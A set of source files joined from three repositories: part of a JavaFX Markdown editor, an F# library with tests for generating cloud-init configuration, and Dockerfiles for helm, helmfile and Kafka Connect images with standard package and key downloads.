"### Title 3\n\n" +
"[link](https://github.com/mayuso/JMarkPad)\n\n" +
"List:\n" +
"* item 1\n" +
"* item 2\n" +
"* item 3\n\n" +
"**bold**\n\n" +
"*italics*\n\n");
examplesTab.setSaved(true);
}
@FXML
public void aboutClicked(ActionEvent ae) {
JFXDialogLayout dialogLayout = new JFXDialogLayout();
String title = "JMarkPad";
dialogLayout.setHeading(new Text(title));
String body = "Why?\n" +
"I created JMarkPad as a tool to experiment with JavaFX.\n" +
"I kept adding functionalities until it became a useful tool.\n\n" +
"Source code\n" +
"Find the full source code and additional in the following github repository\n" +
"https://github.com/mayuso/JMarkPad\n\n" +
"Found a bug?\n" +
"Please feel free to open a new issue in our github issue tracker\n" +
"https://github.com/mayuso/JMarkPad/issues\n\n" +
"Thank you for using JMarkPad :)";
dialogLayout.setBody(new Text(body));
JFXButton btnDialog = new JFXButton("OK");
btnDialog.setCursor(Cursor.HAND);
btnDialog.getStyleClass().add("custom-jfx-button-raised");
dialogLayout.setActions(btnDialog);
JFXDialog dialog = new JFXDialog(stackPane, dialogLayout, JFXDialog.DialogTransition.TOP, false);
btnDialog.setOnAction(e -> dialog.close());
dialog.show();
}
private boolean fileIsAlreadyOpened(String filePath) {
boolean result = false;
for (int i = 0; i < tabPane.getTabs().size(); i++) {
JMPTab currentlyOpenTab = (JMPTab) tabPane.getTabs().get(i);
if (currentlyOpenTab.getFilePath().equals(filePath)) {
tabPane.getSelectionModel().select(i);
result = true;
}
}
return result;
}
private void openFileIntoTab(File file, JMPTab tab) throws IOException {
BufferedReader bufferedReader = new BufferedReader(new FileReader(file));
String text;
JFXTextArea textArea = new JFXTextArea("");
while ((text = bufferedReader.readLine()) != null) {
textArea.appendText(text + "\n");
}
tab.setTextArea(textArea);
bufferedReader.close();
}
private void createPropertiesFile(String filePaths, boolean isNewFile) {
Properties properties = new Properties();
if (isNewFile) {
properties.setProperty("posX", "0");
properties.setProperty("posY", "0");
properties.setProperty("width", "800");
properties.setProperty("height", "600");
properties.setProperty("primaryColor", "#26c6da");
properties.setProperty("secondaryColor", "#2ce8ffff");
properties.setProperty("folderPath", System.getProperty("user.dir"));
properties.setProperty("filePaths", "");
} else {
try {
properties.setProperty("posX", String.valueOf(stage.getX()));
properties.setProperty("posY", String.valueOf(stage.getY()));
properties.setProperty("width", String.valueOf(stage.getWidth()));
properties.setProperty("height", String.valueOf(stage.getHeight()));
properties.setProperty("primaryColor", String.valueOf(primaryColor));
properties.setProperty("secondaryColor", String.valueOf(secondaryColor));
properties.setProperty("folderPath", String.valueOf(folderPath));
properties.setProperty("filePaths", String.valueOf(filePaths));
} catch (Exception e) {
e.printStackTrace();
}
}
try {
properties.store(new FileOutputStream("jmarkpad.properties"), null);
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public void stop() {
String filePaths = new String();
for (Tab tab : tabPane.getTabs()) {
JMPTab mTab = (JMPTab) tab;
filePaths = filePaths.concat(mTab.getFilePath() + ";");
if (!mTab.isSaved) {
mTab.checkIfUserWantsToSaveFile();
}
}
createPropertiesFile(filePaths, false);
System.exit(0);
}
public void refreshTheme() {
decorator.setStyle("-fx-decorator-color: " + primaryColor);
menuBar.setStyle("-fx-background-color: " + primaryColor);
tabPane.setStyle("tab-header-background: " + secondaryColor);
}
}
<|start_filename|>src/main/java/ui/JMPDecorator.java<|end_filename|>
package ui;
import com.jfoenix.controls.JFXDecorator;
import javafx.scene.Node;
import javafx.stage.Stage;
public class JMPDecorator extends JFXDecorator {
public JMPDecorator(Stage stage, Node node) {
super(stage, node);
}
public boolean isBtnFullscreenVisible() {
return super.btnFull.isVisible();
}
public void setBtnFullscreenVisible(boolean isVisible) {
super.btnFull.setVisible(isVisible);
}
}
| mayuso/JMarkPad |
<|start_filename|>FsCloudInit/CloudConfig.fs<|end_filename|>
namespace FsCloudInit
open System
open System.Collections.Generic
module FileEncoding =
[<Literal>]
let Base64 = "b64"
[<Literal>]
let GzipBase64 = "gz+base64"
[<Flags>]
type PosixFilePerm =
| None = 0
| Execute = 1
| Write = 2
| Read = 4
type FilePermissions = {
User : PosixFilePerm
Group : PosixFilePerm
Others : PosixFilePerm
}
with
static member None = PosixFilePerm.None
static member R = PosixFilePerm.Read
static member RW = PosixFilePerm.Read ||| PosixFilePerm.Write
static member RX = PosixFilePerm.Read ||| PosixFilePerm.Execute
static member RWX = PosixFilePerm.Read ||| PosixFilePerm.Write ||| PosixFilePerm.Execute
member this.Value =
$"0{int this.User}{int this.Group}{int this.Others}"
static member Parse (s:string) =
match UInt32.TryParse s with
| true, num when num > 777u -> invalidArg "string" "Invalid values for permission flags."
| true, num ->
{
User = enum<PosixFilePerm> (int (((num % 1000u) - (num % 100u)) / 100u))
Group = enum<PosixFilePerm> (int (((num % 100u) - (num % 10u)) / 10u))
Others = enum<PosixFilePerm> (int (((num % 10u) - (num % 1u)) / 1u))
}
| false, _ -> invalidArg "string" "Malformed permission flags."
type WriteFile =
{
Encoding : string
Content : string
Owner : string
Path : string
Permissions : string
Append : bool
}
static member Default =
{
Encoding = null
Content = null
Owner = null
Path = null
Permissions = null
Append = false
}
type AptSource =
{
Keyid : string
Key : string
Keyserver : string
Source : string
}
static member Default =
{
Keyid = null
Key = null
Keyserver = null
Source = null
}
type Apt() =
member val Sources = Unchecked.defaultof<IDictionary<string, AptSource>> with get, set
type Package =
| Package of string
| PackageVersion of PackageName:string * PackageVersion:string
member this.Model =
match this with
| Package p -> box p
| PackageVersion (name, ver) -> [ name; ver] |> ResizeArray |> box
type Cmd = string list
type RunCmd =
| RunCmd of Cmd list
member this.Model : string seq seq =
match this with
| RunCmd (commands) ->
commands |> Seq.map Seq.ofList
type CloudConfig =
{
Apt : Apt option
FinalMessage : string option
Packages : Package seq
PackageUpdate : bool option
PackageUpgrade : bool option
PackageRebootIfRequired : bool option
RunCmd : RunCmd option
WriteFiles : WriteFile seq
}
static member Default =
{
Apt = None
FinalMessage = None
Packages = []
PackageUpdate = None
PackageUpgrade = None
PackageRebootIfRequired = None
RunCmd = None
WriteFiles = []
}
member this.ConfigModel =
{|
Apt = this.Apt |> Option.defaultValue Unchecked.defaultof<Apt>
FinalMessage = this.FinalMessage |> Option.toObj
Packages =
if this.Packages |> Seq.isEmpty then null
else this.Packages |> Seq.map (fun p -> p.Model)
PackageUpdate = this.PackageUpdate |> Option.toNullable
PackageUpgrade = this.PackageUpgrade |> Option.toNullable
Runcmd = this.RunCmd |> Option.map(fun runCmd -> runCmd.Model) |> Option.toObj
WriteFiles =
if this.WriteFiles |> Seq.isEmpty then null
else this.WriteFiles
|}
<|start_filename|>FsCloudInitTests/ConfigGeneration.fs<|end_filename|>
module ConfigGeneration
open System
open System.Collections.Generic
open System.IO
open System.IO.Compression
open Expecto
open TestShared
open FsCloudInit
[<Tests>]
let tests =
testList "cloud-config generation" [
test "Generates empty cloud config" {
CloudConfig.Default
|> Writer.write
|> matchExpectedAt "empty-config.yaml"
}
test "Generates basic cloud config" {
{
CloudConfig.Default with
PackageUpgrade = Some true
}
|> Writer.write
|> matchExpectedAt "package-upgrade.yaml"
}
test "Generates with packages to install" {
{
CloudConfig.Default with
Packages = [ Package "httpd" ]
PackageUpgrade = Some true
}
|> Writer.write
|> matchExpectedAt "package-install.yaml"
}
testAsync "Embed Microsoft apt source and key" {
// curl -sSL https://packages.microsoft.com/config/ubuntu/20.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft-prod.list
let! aptSourceRes = http.GetAsync "https://packages.microsoft.com/config/ubuntu/20.04/prod.list" |> Async.AwaitTask
let! aptSource = aptSourceRes.Content.ReadAsStringAsync () |> Async.AwaitTask
// curl -sSL https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
let! gpgKeyRes = http.GetAsync "https://packages.microsoft.com/keys/microsoft.asc" |> Async.AwaitTask
let! gpgKey = gpgKeyRes.Content.ReadAsStringAsync () |> Async.AwaitTask
{
CloudConfig.Default with
Apt =
Apt (
Sources =
dict [
"microsoft-prod", { AptSource.Default with Key = gpgKey; Source = aptSource}
]
) |> Some
PackageUpdate = Some true
Packages = [Package "apt-transport-https"; Package "dotnet-sdk-6.0"]
}
|> Writer.write
|> matchExpectedAt "apt-source.yaml"
}
testAsync "Install specific dotnet SDK version" {
let! aptSourceRes = http.GetAsync "https://packages.microsoft.com/config/ubuntu/20.04/prod.list" |> Async.AwaitTask
let! aptSource = aptSourceRes.Content.ReadAsStringAsync () |> Async.AwaitTask
let! gpgKeyRes = http.GetAsync "https://packages.microsoft.com/keys/microsoft.asc" |> Async.AwaitTask
let! gpgKey = gpgKeyRes.Content.ReadAsStringAsync () |> Async.AwaitTask
{
CloudConfig.Default with
Apt =
Apt (
Sources =
dict [
"microsoft-prod", { AptSource.Default with Key = gpgKey; Source = aptSource}
]
) |> Some
PackageUpdate = Some true
Packages = [
Package "apt-transport-https"
PackageVersion (PackageName="dotnet-sdk-6.0", PackageVersion="6.0.100-1")
]
}
|> Writer.write
|> matchExpectedAt "package-specific.yaml"
}
test "Embed file" {
let content = "hello world"
{
CloudConfig.Default with
WriteFiles = [
{
WriteFile.Default with
Encoding = FileEncoding.Base64
Content = content |> System.Text.Encoding.UTF8.GetBytes |> Convert.ToBase64String
Path = "/var/lib/data/hello"
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding.yaml"
}
test "Embed Gzipped file" {
let contentStream = new MemoryStream("hello world" |> System.Text.Encoding.UTF8.GetBytes)
use compressedContent = new MemoryStream()
using (new GZipStream(compressedContent, CompressionMode.Compress))
(fun gz -> contentStream.CopyTo(gz))
let b64 = compressedContent.ToArray() |> Convert.ToBase64String
let yaml =
{
CloudConfig.Default with
WriteFiles = [
{
WriteFile.Default with
Encoding = FileEncoding.GzipBase64
Content = b64
Path = "/var/lib/data/hello"
}
]
}
|> Writer.write
let data:Dictionary<string, ResizeArray<Dictionary<string,string>>> =
YamlDotNet.Serialization.Deserializer().Deserialize(yaml)
let content = data.["write_files"].[0].["content"]
let gzContent = content |> System.Convert.FromBase64String
use uncompressed = new MemoryStream()
using (new GZipStream(new MemoryStream(gzContent), CompressionMode.Decompress))
( fun gz -> gz.CopyTo uncompressed )
let helloWorld = uncompressed.ToArray() |> System.Text.Encoding.UTF8.GetString
Expect.equal helloWorld "hello world" "Unzipped data didn't match"
}
test "File permission string generation" {
let perms1 = {
User = FilePermissions.RWX
Group = FilePermissions.RW
Others = FilePermissions.R
}
Expect.equal perms1.Value "0764" "Unexpected permission mask perms1"
let perms2 = {
User = FilePermissions.None
Group = FilePermissions.None
Others = FilePermissions.None
}
Expect.equal perms2.Value "0000" "Unexpected permission mask perms2"
let perms3 = {
User = FilePermissions.RW
Group = FilePermissions.R
Others = FilePermissions.R
}
Expect.equal perms3.Value "0644" "Unexpected permission mask perms3"
let perms4 = {
User = FilePermissions.R
Group = FilePermissions.None
Others = FilePermissions.None
}
Expect.equal perms4.Value "0400" "Unexpected permission mask perms4"
}
test "File permission string parsing" {
let perms764 = FilePermissions.Parse "764"
let expected = {
User = FilePermissions.RWX
Group = FilePermissions.RW
Others = FilePermissions.R
}
Expect.equal perms764 expected "Parsing permissions returned incorrect value."
}
test "Embed readonly file" {
let content = "hello world"
{
CloudConfig.Default with
WriteFiles = [
{
WriteFile.Default with
Encoding = FileEncoding.Base64
Content = content |> System.Text.Encoding.UTF8.GetBytes |> Convert.ToBase64String
Path = "/var/lib/data/hello"
Owner = "azureuser:azureuser"
Permissions = {
User = FilePermissions.R
Group = FilePermissions.None
Others = FilePermissions.None }.Value
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding-readonly.yaml"
}
test "Run a command" {
{
CloudConfig.Default with
RunCmd =
[
[ "ls"; "-l"; "/" ]
[ "sh"; "-c"; "date >> whatsthetime.txt && cat whatsthetime.txt" ]
"apt update".Split null |> List.ofArray
] |> RunCmd |> Some
}
|> Writer.write
|> matchExpectedAt "run-command.yaml"
}
test "Print a final message" {
{
CloudConfig.Default with
FinalMessage = Some "#### Cloud-init is done! ####"
}
|> Writer.write
|> matchExpectedAt "final-message.yaml"
}
]
<|start_filename|>FsCloudInitTests/BuilderTests.fs<|end_filename|>
module BuilderTests
open System.Collections.Generic
open System.IO
open System.IO.Compression
open Expecto
open TestShared
open FsCloudInit
open FsCloudInit.Builders
[<Tests>]
let tests =
testList "cloud-config generation" [
test "Install packages by name" {
cloudConfig {
package_upgrade true
add_packages [
"httpd"
]
}
|> Writer.write
|> matchExpectedAt "package-install.yaml"
}
test "Embed file builder" {
cloudConfig {
write_files [
writeFile {
path "/var/lib/data/hello"
content "hello world"
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding.yaml"
}
test "Embed gzipped file builder" {
let yaml =
cloudConfig {
write_files [
writeFile {
path "/var/lib/data/hello"
gzip_data "hello world"
}
]
}
|> Writer.write
let data:Dictionary<string, ResizeArray<Dictionary<string,string>>> =
YamlDotNet.Serialization.Deserializer().Deserialize(yaml)
let content = data.["write_files"].[0].["content"]
let gzContent = content |> System.Convert.FromBase64String
use uncompressed = new MemoryStream()
using (new GZipStream(new MemoryStream(gzContent), CompressionMode.Decompress))
( fun gz -> gz.CopyTo uncompressed )
let helloWorld = uncompressed.ToArray() |> System.Text.Encoding.UTF8.GetString
Expect.equal helloWorld "hello world" "Unzipped data didn't match"
}
test "Embed readonly file builder" {
cloudConfig {
write_files [
writeFile {
path "/var/lib/data/hello"
content "hello world"
owner "azureuser:azureuser"
permissions "400"
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding-readonly.yaml"
}
testAsync "Install dotnet with aptSource builders" {
let! aptSourceRes = http.GetAsync "https://packages.microsoft.com/config/ubuntu/20.04/prod.list" |> Async.AwaitTask
let! aptSourceVal = aptSourceRes.Content.ReadAsStringAsync () |> Async.AwaitTask
let! gpgKeyRes = http.GetAsync "https://packages.microsoft.com/keys/microsoft.asc" |> Async.AwaitTask
let! gpgKey = gpgKeyRes.Content.ReadAsStringAsync () |> Async.AwaitTask
cloudConfig {
add_apt_sources [
aptSource {
name "microsoft-prod"
key gpgKey
source aptSourceVal
}
]
package_update true
add_packages [
Package "apt-transport-https"
PackageVersion (PackageName="dotnet-sdk-6.0", PackageVersion="6.0.100-1")
]
}
|> Writer.write
|> matchExpectedAt "package-specific.yaml"
}
test "Final message with cloudConfig builder" {
cloudConfig {
final_message "#### Cloud-init is done! ####"
}
|> Writer.write
|> matchExpectedAt "final-message.yaml"
}
test "Run commands with cloudConfig builder" {
cloudConfig {
run_commands [
[ "ls"; "-l"; "/" ]
[ "sh"; "-c"; "date >> whatsthetime.txt && cat whatsthetime.txt" ]
"apt update".Split null
]
}
|> Writer.write
|> matchExpectedAt "run-command.yaml"
}
]
<|start_filename|>FsCloudInitTests/TestShared.fs<|end_filename|>
module TestShared
open System
open System.IO
open Expecto
let http = new System.Net.Http.HttpClient()
let matchExpectedAt (expectedContentFile:string) (generatedConfig:string) =
let expected = File.ReadAllText $"TestContent/{expectedContentFile}"
Expect.equal (generatedConfig.Trim()) (expected.Trim()) $"Did not match expected config at TestContent/{expectedContentFile}"
<|start_filename|>FsCloudInit/Writer.fs<|end_filename|>
namespace FsCloudInit
open System
open YamlDotNet.Serialization
module Writer =
let write (config:CloudConfig) =
let serializer =
SerializerBuilder()
.WithNamingConvention(YamlDotNet.Serialization.NamingConventions.UnderscoredNamingConvention.Instance)
.ConfigureDefaultValuesHandling(DefaultValuesHandling.OmitDefaults)
.Build()
String.Concat ("#cloud-config", Environment.NewLine, serializer.Serialize config.ConfigModel)
<|start_filename|>FsCloudInit/Builders.fs<|end_filename|>
namespace FsCloudInit
open System
open System.IO.Compression
module Builders =
/// Builder for a WriteFile record.
type WriteFileBuilder () =
member _.Yield _ = WriteFile.Default
[<CustomOperation "path">]
member _.Path (writeFile:WriteFile, path:string) =
{ writeFile with Path = path }
[<CustomOperation "content">]
member _.Content (writeFile:WriteFile, content:string) =
{ writeFile with
Encoding = FileEncoding.Base64
Content = content |> System.Text.Encoding.UTF8.GetBytes |> Convert.ToBase64String }
[<CustomOperation "gzip_data">]
member _.GZipData (writeFile:WriteFile, contentStream:System.IO.Stream) =
use compressed = new System.IO.MemoryStream()
using (new GZipStream(compressed, CompressionMode.Compress)) contentStream.CopyTo
let content = compressed.ToArray() |> Convert.ToBase64String
{ writeFile with
Encoding = FileEncoding.GzipBase64
Content = content }
member this.GZipData (writeFile:WriteFile, content:byte []) =
use ms = new System.IO.MemoryStream(content)
this.GZipData (writeFile, ms)
member this.GZipData (writeFile:WriteFile, content:string) =
use ms = new System.IO.MemoryStream(content |> System.Text.Encoding.UTF8.GetBytes)
this.GZipData (writeFile, ms)
[<CustomOperation "base64_encoded_content">]
member _.Base64EncodedContent (writeFile:WriteFile, content:string) =
{ writeFile with
Encoding = FileEncoding.Base64
Content = content }
[<CustomOperation "owner">]
member _.Owner (writeFile:WriteFile, owner:string) =
{ writeFile with Owner = owner }
[<CustomOperation "permissions">]
member _.Permissions (writeFile:WriteFile, permissions:string) =
{ writeFile with Permissions = FilePermissions.Parse(permissions).Value }
member _.Permissions (writeFile:WriteFile, permissions:FilePermissions) =
{ writeFile with Permissions = permissions.Value }
[<CustomOperation "append">]
member _.Append (writeFile:WriteFile, append:bool) =
{ writeFile with Append = append }
let writeFile = WriteFileBuilder ()
type AptSourceConfig =
{
Name : string
Source : AptSource
}
static member Default = { Name = ""; Source = AptSource.Default }
type AptSourceBuilder () =
member _.Yield _ = AptSourceConfig.Default
[<CustomOperation "name">]
member _.Name (aptSource:AptSourceConfig, name:string) =
{ aptSource with Name = name }
[<CustomOperation "keyid">]
member _.KeyId (aptSource:AptSourceConfig, keyid:string) =
{ aptSource with Source = { aptSource.Source with Keyid = keyid } }
[<CustomOperation "key">]
member _.Key (aptSource:AptSourceConfig, key:string) =
{ aptSource with Source = { aptSource.Source with Key = key } }
[<CustomOperation "keyserver">]
member _.KeyServer (aptSource:AptSourceConfig, keyserver:string) =
{ aptSource with Source = { aptSource.Source with Keyserver = keyserver } }
[<CustomOperation "source">]
member _.Source (aptSource:AptSourceConfig, source:string) =
{ aptSource with Source = { aptSource.Source with Source = source } }
let aptSource = AptSourceBuilder ()
/// Builder for a CloudConfig record.
type CloudConfigBuilder () =
member _.Yield _ = CloudConfig.Default
[<CustomOperation "write_files">]
member _.WriteFiles (cloudConfig:CloudConfig, writeFiles: WriteFile seq) =
{ cloudConfig with WriteFiles = writeFiles }
[<CustomOperation "add_apt_sources">]
member _.Apt (cloudConfig:CloudConfig, aptSources: AptSourceConfig seq) =
match cloudConfig.Apt with
| Some apt ->
for source in aptSources do
apt.Sources.[source.Name] <- source.Source
cloudConfig
| None ->
let sources = aptSources |> Seq.map (fun s -> s.Name, s.Source) |> dict
{ cloudConfig with Apt = Some (Apt (Sources = sources)) }
[<CustomOperation "package_update">]
member _.PackageUpdate (cloudConfig:CloudConfig, packageUpdate:bool) =
{ cloudConfig with PackageUpdate = Some packageUpdate }
[<CustomOperation "package_upgrade">]
member _.PackageUpgrade (cloudConfig:CloudConfig, packageUpgrade:bool) =
{ cloudConfig with PackageUpgrade = Some packageUpgrade }
[<CustomOperation "add_packages">]
member _.AddPackages (cloudConfig:CloudConfig, packages:Package seq) =
{ cloudConfig with Packages = Seq.append cloudConfig.Packages packages }
member _.AddPackages (cloudConfig:CloudConfig, packages:string seq) =
let packages = packages |> Seq.map Package
{ cloudConfig with Packages = Seq.append cloudConfig.Packages packages }
[<CustomOperation "final_message">]
member _.FinalMessage (cloudConfig:CloudConfig, message:string) =
{ cloudConfig with FinalMessage = Some message }
[<CustomOperation "run_commands">]
member _.RunCommands (cloudConfig:CloudConfig, commands:string seq seq) =
let cmdList = commands |> Seq.map List.ofSeq |> List.ofSeq
{ cloudConfig with
RunCmd =
match cloudConfig.RunCmd with
| Some (RunCmd runCmd) -> List.append runCmd cmdList
| None -> cmdList
|> RunCmd |> Some
}
let cloudConfig = CloudConfigBuilder ()
| ninjarobot/FsCloudInit |
<|start_filename|>helm/Dockerfile<|end_filename|>
FROM chatwork/alpine-sdk:3.12
ARG HELM_VERSION=3.7.2
LABEL version="${HELM_VERSION}"
LABEL maintainer="<EMAIL>"
LABEL maintainer="<EMAIL>"
ENV HELM_FILE_NAME helm-v${HELM_VERSION}-linux-amd64.tar.gz
WORKDIR /
RUN apk --update --no-cache add ca-certificates bash
ADD https://get.helm.sh/${HELM_FILE_NAME} /tmp
RUN tar -zxvf /tmp/${HELM_FILE_NAME} -C /tmp \
&& mv /tmp/linux-amd64/helm /usr/bin/helm \
&& rm -rf /tmp/*
ENTRYPOINT ["/usr/bin/helm"]
<|start_filename|>kafka-connect-mysql/Dockerfile<|end_filename|>
ARG KAFKA_CONNECT_VERSION=5.5.6
# https://github.com/confluentinc/cp-docker-images/blob/5.3.1-post/debian/kafka-connect-base/Dockerfile
FROM confluentinc/cp-kafka-connect-base:${KAFKA_CONNECT_VERSION}
ARG KAFKA_CONNECT_VERSION=5.5.6
ARG MYSQL_CONNECTOR_VERSION=8.0.27
LABEL version="${KAFKA_CONNECT_VERSION}-${MYSQL_CONNECTOR_VERSION}"
LABEL maintainer="<EMAIL>"
LABEL maintainer="<EMAIL>"
RUN wget -qO - http://packages.confluent.io/deb/$(echo $KAFKA_CONNECT_VERSION | sed 's/\.[0-9]*$//')/archive.key | apt-key add - \
&& apt-get update && apt-get install -y --no-install-recommends \
confluent-kafka-connect-jdbc=${KAFKA_CONNECT_VERSION}-1 \
&& wget -O /usr/share/java/kafka/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.jar https://repo1.maven.org/maven2/mysql/mysql-connector-java/${MYSQL_CONNECTOR_VERSION}/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.jar \
&& mv /usr/share/java/kafka-connect-jdbc/* /usr/share/java/kafka/ \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
EXPOSE 8083
<|start_filename|>helmfile/Dockerfile<|end_filename|>
ARG HELMFILE_VERSION=0.142.0
FROM quay.io/roboll/helmfile:v${HELMFILE_VERSION}
ARG HELMFILE_VERSION=0.142.0
ARG HELM_X_VERSION=0.8.1
LABEL version="${HELMFILE_VERSION}"
LABEL maintainer="<EMAIL>"
LABEL maintainer="<EMAIL>"
WORKDIR /
RUN helm plugin install https://github.com/mumoshu/helm-x --version v${HELM_X_VERSION}
RUN apk --no-cache add python3 py3-pip groff jq \
&& pip3 install --no-cache-dir --upgrade pip \
&& pip3 install --no-cache-dir awscli
ENTRYPOINT ["/usr/local/bin/helmfile"]
| chatwork/dockerfiles |